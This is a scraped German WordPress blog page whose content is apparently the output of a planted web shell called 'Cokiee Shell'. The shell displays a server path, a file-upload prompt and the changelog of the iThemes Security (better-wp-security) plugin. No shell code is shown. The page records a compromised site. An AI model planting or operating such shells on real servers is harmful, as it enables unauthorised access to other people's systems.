Hallo Welt!

von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare

Cokiee Shell

Current Path : /var/www/web284/html/wp-content/plugins/better-wp-security/modules/free/

Upload File :

Current File : //var/www/web284/html/wp-content/plugins/better-wp-security/modules/free/history.txt

1.0.0 - 2014-03-25 - Chris Wiegman
	Initial Release
1.0.1 - 2014-03-25 - Chris Wiegman
	Better Check for empty IP strings when creating rewrite rules. Should improve upgrade process.
1.0.2 - 2014-03-27 - Chris Wiegman
	Away mode settings now accept PM time
	Removed the pingback URL from the header if xmlrpc disabled.
	Added file locking to admin user operations to [hopefully] avoid duplicated users.
	Fixed minor typos
1.0.3 - 2014-04-01 - Chris Wiegman
	Fixed history.txt (for iThemes customers)
	Removed extra quotes that could appear in user agents
	Removed error message on login page when jQuery replace in use
	Don't use WordPress rewrites for hide backend, we now create our own rewrite rule
	All modules now use newer upgrade method
	Fix modal dismiss button on settings page
	Ban users rules now should work with proxies
	Saving settings will always generate and write rewrite rules if file writing is allowed
	Hide backend now works with multisite and subdirectory installs
	Make sure tables exist if manually updating from 3.x
	Move admin user settings to advanced page
	Make sure logout happens after processing admin user changes
	All modules now rewritten to call rules on build
	Rename backup and logs folders when wp-content is renamed
	Delay file scan by at least 2 minutes when saving settings
	Added "theme compatibility" mode to remove errors in hide backend caused by themes conflicting with the feature.
1.0.4 - 2014-04-01 - Chris Wiegman
	Removed error message that could happen on user creation with strong passwords enabled
	Moved strong password js later in execution cycle to prevent errors
	More hide backend tweaks to cover remaining white screen issues
	Removed option to enqueue a new version of jQuery unless it is needed
1.0.5 - 2014-04-02 - Chris Wiegman
	only save post meta for ssl when the value is true
	fixed missing admin user settings if only one part had been changed
	SSL Redirection working properly on front end. No more redirect errors
	hide backend will warn of the new url when saving
	hide backend will now email the notification email(s) when the login area has been moved
	Added BackupBuddy coupon
1.0.6 - 2014-04-03 - Chris Wiegman
	Private posts will now work with hide backend
	Added an option for custom login action that can bypass hide login
	Allow admin-ajax.php to bypass hide backend
	Added filters for external backup plugins to register with the dashboard
	Enable theme compatibility mode by default
	Miscellaneous copy and function doc fixes
1.0.7 - 2014-04-05 - Chris Wiegman
	Fixed an NGINX rule that didn't actually block XMLRPC.php
	Updated rule order on ban users
	Fixed a bug that could prevent away from from turning off in certain time configurations (this resulted in the return to homepage on login)
	Updated some function doc
1.0.8 - 2014-04-05 - Chris Wiegman
	Fixed bug preventing file change scanning from advancing when chunked
	Don't autoload file list on non-multisite installations
	Make sure away mode settings transfer from 3.x or disable away mode
1.0.9 - 2014-04-08 - Chris Wiegman
	Make sure unset admin user field remains if the other setting has been fixed
	Removed admin user from settings table of contents
	Make sure array input is trimmed in file change module
	Correct input type on file change settings sanitization
	Use full URL on file change warning redirect to prevent invalid target
	Reduce erroneous hide backend change warnings
	When accessing htaccess or wpconfig make sure opening settings changes are 664 instead of 644 to reduce issues
	Update hackrepair.com's Agents blacklist
1.0.10 - 2014-04-08 - Chris Wiegman
	Clean up away mode to prevent lockouts on update or other points
1.0.11 - 2014-04-10 - Chris Wiegman
	Added ability to "soft" block XMLRPC to prevent pingback vulnerability while still allowing other access
	Updated "Suspicious queary strings" to not block plugin updates
	Update NGINX comment spam rewrite rules to better work with multi-site domain mapping
	Move 404 hook in hide backend from wp to wp_loaded
	Make sure super-admin role is maintained on multi-site when changing user id 1 and admin username at the same time
	Make sure all redirects for hide backend and ssl are 302, not 301
	Better resetting of SSL and disallow file editor on deactivation to account for more states
	Make sure hide backend works with registration
	Minor copy and other fixes
1.0.12 - 2014-04-14 - Chris Wiegman
	Fix sorting by count in 404 Logs
	Minor code cleanup
	Make sure all wp_enqueue_script dependencies are in proper format
	Reduce priority of hide backend init for better compatibility with other plugins
	SSL now logs users out when activating to prevent cookie conflicts
1.0.13 - 2014-04-17 - Chris Wiegman
	Make sure backup directory is present before trying to use it
	Make sure backup file method is respected on all backup operations
	Added ability to limit number of backups saved to disk
	Minor typo and other fixes
	Only load front-end classes as needed
	Add link to free support at .org forums
	Remove select(?ed) from suspicious query strings for 3.9 compatibility
	Fixed domain mapping issue (requires http://wordpress.org/plugins/wordpress-mu-domain-mapping/ domain mapping plugin)
	Remove array type errors on 404 pages
	Remove remaining create function calls
1.0.14 - 2014-04-18 - Chris Wiegman
	XMLRPC soft block should now work with WordPress mobile app
1.1.0 - 2014-04-21 - Chris Wiegman
	Log when Away-mode is triggered
	Make sure away mode file isn't accidently deleted
	Make sure away mode doesn't even allow access to the login form (as it didn't in 3.x)
	Enhance warnings on "Change content directory" settings
	Better descriptions on white lists
	Fixed XMLRPC label
	Better XMLRPC Dashboard status
	Don't allow logout action on wp-login.php with hide backend
1.1.1 - 2014-04-21 - Chris Wiegman
	Better check for variable in SSL admin
1.1.2 - 2014-04-24 - Chris Wiegman
	Fixed a function not found error in the brute force module
	Improved content filtering in SSL so that more images and other content will link with appropriate protocol.
	Fixed hide backend in cases where a lockout has expired
	Miscelaneous typos and other fixes.
1.2.0 - 2014-05-07 - Chris Wiegman
	Don't allow empty file types in file change exclusions
	Add Sync integration for Away Mode
	Minor typo and other fixes
1.2.1 - 2014-05-19 - Chris Wiegman
	Consolidate white lists into one option
	Fix IP mask calculations
	Fix NGINX IP range blocking
	Update modules to use new logging
	Minor refactoring
	Add metabox for iThemes Sync
	Update jQuery version in tweaks
	Shortened file change array names to save space
1.2.2 - 2014-05-28 - Chris Wiegman
	Make sure backup disables itself when other backup solutions are present
	Fix tweet link
	Minor fixes and cleanup
1.2.3 - 2014-06-11 - Chris Wiegman
	Minor formatting and typo fixes
	Make sure front-end classes are available only when needed
	Fixed default types in file change settings
	Added file type exclusion to 404 settings
	Allow for Jetpack SSO to function with suspicious queries turned on
	Use WordPress' PclZip for backup zip
1.2.4 - 2014-06-12 - Chris Wiegman
	Don't filter hide backend hash until after schema redirect
	don't send file change email on first scan
	Fixed verbage when changing login URL
	Modified ban users rewrites for apache. Should work with proxy and if setenvif isn't enabled.
1.2.5 - 2014-06-12 - Chris Wiegman
	Fixed error on line 55 of class-itsec-four-oh-four.php that could occur under certain circumstances
1.2.6 - 2014-06-12 - Chris Wiegman
	Fixed 404 error on https with hide backend.
1.2.7 - 2014-06-12 - Chris Wiegman
	Fixed error for missing function in hide backend
1.2.8 - 2014-07-02 - Chris Wiegman
	Fixed a bug preventing file-change scanning from running when manually executed from the "Logs" page
	Fixed a bug where an error could be generated if the saved files from the file change feature weren't properly saved
	Fixed comment approval email links to make sure they work when a user is not logged in and hide backend is in effect
	Fixed responsive issues in iThemes notifications that prevented notifications from being easily read on small screens.
1.3.0 - 2014-07-28 - Chris Wiegman
	Added on-demand malware scanning for the homepage
	Fixed Error in 404 scanning if path field was empty
	Updated hackrepair.com's default blacklist
	Modified support reminder to ask users to upgrade rather than donate
	Use get_home_path() in place of ABSPATH to account for WordPress core in a different directory than wp-content
	Use PHP comments in index.php file to account for the possibility of a scan including the file in which case the html comment could result in an error
	Fixed various typos throughout the plugin dashboard
	Added ability to prevent file change scanning from running on a given page load by defining ITSEC_FILE_CHECK_CRON to true
	Cleaned up file change logging reports to me more clear when no files have been changed
	Added feature to immediately ban user "admin" when no user "admin" exists on the site and a host tries to log in with it anyway
	Added blank line to end of all textarea input to make it easier to input data
	Added brute force checks to XMLRPC calls to prevent brute force attacks against XMLRPC
1.3.1 - 2014-07-28 - Chris Wiegman
	Fixed an inadvertant disabling of file change scans intrudced in 4.3
1.3.2 - 2014-07-29 - Chris Wiegman
	Updated descriptions an instructions in malware scheduling to make the feature easier to use
	Numerous typo corrections throughout dashboard
1.3.3 - 2014-07-30 - Chris Wiegman
	Clean up notifications for file change detection and malware scanning
1.3.4 - 2014-08-11 - Chris Wiegman
	Remove error message if WP_Error is returned with wp_remote_post in malware scan
	Fixed bug where away-mode was still enabled after one-time period has passed which could result in away mode activating when it should not
	Fixed error in brute force protection that counts valid logins with XML-RPC as bad logins towards a brute force lockout.
1.3.5 - 2014-08-20 - Chris Wiegman
	Low Severity Security Fix - Lack of access control patched - Sucuri (reported 19Aug2014)
	Fixed an error in XMLRPC blocking when $username variable cannot be found
1.4.0 - 2014-09-09 - Chris Wiegman
	New Feature: Add IPCheck Brute Force API integration
	Enhancement: Reordered sidebar items to make it easier for the user to get to the information they need from iThemes
	Fixed: The plugins_loaded hook which fires on logout will now fire later to improve compatibility with iThemes Exchange
	Fixed: multisite bug that still showed BackupBuddy (if present) even though BackupBuddy is not multisite compatible.
	Fixed: Added an extra flag in an attempt to reduce duplicate file-change detection executions.
	Fixed: Added missing index.php files to directories that were missing them to ensure no information could be attained if directory is turned on.
	Fixed: Make sure hide backend rewrite rules are consistent with the correct location of the WordPress login page when WordPress is not installed in the main website folder.
	Fixed: Fixed an error whereas an empty filter could display an error when building the log tables.
1.4.1 - 2014-09-09 - Chris Wiegman
	Fixed: Fixed an error that could occur on multisite due to a missing "core" object
1.4.2 - 2014-09-09 - Chris Wiegman
	Fixed: Force stylesheet reload for new nags and other items by pushing plugin build number to stylesheet registrations
1.4.3 - 2014-09-10 - Chris Wiegman
	Fixed: fixed possible undefined api_error variable on line 316 if WordPress believes the email address is invalid.
	Fixed: failed calls to various apis will no longer throw a php error on failure.
1.4.4 - 2014-09-15 - Chris Wiegman
	Enhancement: Added a link to the actual timezone settings in the general settings page (instead of the top of the page)
	Fixed: Fixed missing "no changes" text in file change emails.
	Fixed: Formatting of individual file change emails will now work.
	Fixed: Fixed a bug in ban users user agents that would cause a crash on Apache if the user agent contained a space
	Fixed: When an invalid backup directory is detected it will not fail but will instead reset it to the original.
1.4.5 - 2014-09-16 - Chris Wiegman
	Enhancement: Updated copy on Virustotal API key to indicate that a private key is not needed.
	Fixed: More complete check for user id when resettings password will prevent undefined index login on line 62 error.
	Fixed: Fixed a bug that prevented the api key from saving after resetting the key.
	Fixed: Removed errors that could occur due to the use of custom capabilities and roles.
1.4.6 - 2014-09-17 - Chris Wiegman
	Only code cleanup
1.4.7 - 2014-10-09 - Chris Wiegman
	Enhancement: File change summary emails are more concise and will avoid extra information
	Fixed: Hide backend will now work with Jetpack's JSON API authorization.
	Fixed: Option to change user ID 1 will correctly disappear when not present
	Fixed: Removed empty user agent from default blacklist to avoid issues with external services
	Fixed: File change folder check will no longer scan directories outside of ABSPATH for any reason
	Fixed: Adding define( 'ITSEC_FILE_CHANGE_CRON', true ); to wp-config.php will cause the file change scanner to only run once daily via wp-cron.
	Fixed: Compatibility issue where strong password enforcement could cause an error if passwords are changed outside of the core of WordPress
	Fixed: Lost password url should now be correct on multisite.
1.4.8 - 2014-10-13 - Chris Wiegman
	New Pro Feature: Dashboard widget. Get important information and handle user blocking right from the WordPress Dashboard.
	Fixed: When using wp-cron for file checking cron check will run daily instead of hourly.
1.4.9 - 2014-10-21 - Chris Wiegman
	New Pro Feature: File change scanning will now compare WordPress core files to the WordPress.org repository.
1.4.10 - 2014-10-28 - Chris Wiegman
	Enhancement: More time/date information is now shown in the logs for file change scanning
	Fixed: Filechange will no longer show false positives with every change in DST (although this will cause run round of such notifications on update).
	Fixed: Link to malware scanning logs will work.
1.5.0 - 2014-12-04 - Chris Wiegman
	New Feature: Perform file scan via iThemes Sync
	New Feature: Perform malware scan via iThemes Sync
	Fixed: Make sure to esc urls on SSL redirects (unreported minor security fix)
	Fixed: Added filters to SSL to try to catch more assets
	Fixed: Suspicious query strings feature should no longer conflict with many plugins
	Fixed: File change detection should no longer throw an error if opendir failed
1.5.1 - 2014-12-16 - Chris Wiegman
	Fixed: Removed unneeded fields in malware
1.5.2 - 2015-01-05 - Chris Wiegman
	Fix/Enhancement: Code refactoring of numerous modules
	Fix: Hiding available updates in multi-site will no longer block wp-cli from detecting updates.
	Fix: Removed leftover JavaScript debugging statements.
1.5.3 - 2015-01-12 - Chris Wiegman
	Fix: Fixed typo on file change warning emails.
1.6.0 - 2015-01-21 - Chris Wiegman
	New Feature: Change WordPress Salts
1.6.1 - 2015-02-17 - Chris Wiegman
	Enhancement: Minor refactoring for performance and scalability.
	Enhancement: Add ITSEC_BACKUP_CRON constant to replace plugin's backup scheduler with wp_cron.
	Enhancement: Add dashboard reminder to salts to prompt for periodic salt changes.
1.6.2 - 2015-02-26 - Chris Jean
	Bug Fix: When a file scan is run from iThemes Sync, a warning will no longer be added to the site's error log.
1.6.3 - 2014-03-20 - Chris Jean
	Bug Fix: Fixed incorrect text describing the "Backups to Retain" database backup setting.

Cokiee Shell Web 1.0, Coded By Razor

Kommentar absenden Antworten abbrechen

Du musst angemeldet sein, um einen Kommentar abzugeben.